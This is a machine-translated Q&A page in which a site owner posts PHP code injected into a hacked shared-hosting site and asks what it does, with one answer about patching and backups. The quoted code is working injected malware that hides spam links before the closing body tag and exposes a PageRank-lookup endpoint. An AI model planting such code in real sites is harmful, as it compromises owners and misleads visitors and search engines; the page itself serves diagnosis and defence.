那些遇到过的问题

我的网站被污损了.如何在共享主机上保护自己?

Sar*_* B. 4 php

我有godaddy共享主机,该网站被污损.谁的错?该网站是用PHP创建的,这个人可以通过我的网站上的某些可用性进入并修改文件吗?或者是整个服务器端都是那个godaddy不够安全吗?

这是在文件中注入的内容.它有什么作用?

<?php
//{{1311051f

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;

$olderrxxx=error_reporting(0);

function outputxxx_callback($str)
{
  $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="rb4d41ca36473534443c002805"><a href="http://www.wcvi.org/community_development/ecogardners/fresh/blow-jobs-teen/blow-jobs-teen.html">blow jobs teen</a><br></div></SPAN>';
  preg_match("|</body>|si",$str,$arr);
  return str_replace($arr[0],$links.$arr[0],$str);
}

function StrToNum($Str, $Check, $Magic)
{
   $Int32Unit = 4294967296;
   $length = strlen($Str);
   for ($i = 0; $i < $length; $i++) {
       $Check *= $Magic;
       if ($Check >= $Int32Unit) {
           $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
           $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
       }
       $Check += ord($Str{$i});
   }
   return $Check;
}
function HashURL($String)
{
   $Check1 = StrToNum($String, 0x1505, 0x21);
   $Check2 = StrToNum($String, 0, 0x1003F);

   $Check1 >>= 2;
   $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
   $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
   $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

   $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
   $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

   return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
   $CheckByte = 0;
   $Flag = 0;

   $HashStr = sprintf('%u', $Hashnum) ;
   $length = strlen($HashStr);

   for ($i = $length-1; $i >= 0;  $i--) {
       $Re = $HashStr{$i};
       if (1 === ($Flag % 2)) {
           $Re += $Re;
           $Re = (int)($Re / 10) + ($Re % 10);
       }
       $CheckByte += $Re;
       $Flag ++;
   }

   $CheckByte %= 10;
   if (0 !== $CheckByte) {
       $CheckByte = 10 - $CheckByte;
       if (1 === ($Flag % 2) ) {
           if (1 === ($CheckByte % 2)) {
               $CheckByte += 9;
           }
           $CheckByte >>= 1;
       }
   }

   return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
   $ch = CheckHash(HashURL($url));
   $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
   $data = file_get_contents($file);
   $pos = strpos($data, "Rank_");
   if($pos === false){return -1;} else{
       $pr=substr($data, $pos + 9);
       $pr=trim($pr);
       $pr=str_replace("
",'',$pr);
       return $pr;
   }
}

if(isset($_POST['xxxprch']))
{
    echo getpr($_POST['xxxprch']);
    exit();
}
else
  ob_start('outputxxx_callback');

error_reporting($olderrxxx);
}

//}}75671d8f
?>
Run Code Online (Sandbox Code Playgroud)

Bra*_*tie 9

有可能是您在网站上使用的软件包(例如phpBB,phpNuke等)的漏洞,人们抓取网络寻找易受攻击的主机并利用他们可以使用的软件包.代码是开源的,随时可用,因此除了使用最新版本之外,您无法做很多保护.

PacketStormSecurity这样的公司可以让"skript kiddies"轻松找到PoC(概念验证)脚本,并且他们可以自己在每个网站上进行尝试.有些像精心设计的谷歌查询一样容易找到潜在目标列表.

您可以查看日志以查找导致漏洞利用的GET URL,但最佳情况是尽可能保持最新状态,并且永远不要依赖主机来进行可恢复的备份现场.

归档时间:

查看次数:

2324 次

最近记录:

12 年,8 月 前
相关归档
如何在PHP中的函数内获取函数名称? 222
关闭弃用的错误php 5.3 121
如何在PHP中替换Microsoft编码的引号 68
For循环问题中的PHP字符迭代 36
根据部分字符串选择数组键 32
PHP函数,变量作为参数的默认值 32
PHP MySQLi OOP中" - >"和"::"之间的区别 28
使用PHP检测SSL 26
Win7上的XAMPP太慢了 25
Mysql VIEWS与PHP查询 20
难疑归档
如何水平居中<div>? 4116
比较Git中的两个分支? 2149
为什么GCC不优化a*a*a*a*a*a到(a*a*a)*(a*a*a)? 2083
动态创建元素的事件绑定? 1677
外部"C"在C++中有什么影响? 1511
JavaScript发布请求,如表单提交 1465
在Bash中循环遍历一串字符串? 1371
如何让ASP.NET Web API使用Chrome返回JSON而不是XML? 1220
Django会扩展吗? 1101
什么是首选的Bash shebang? 1051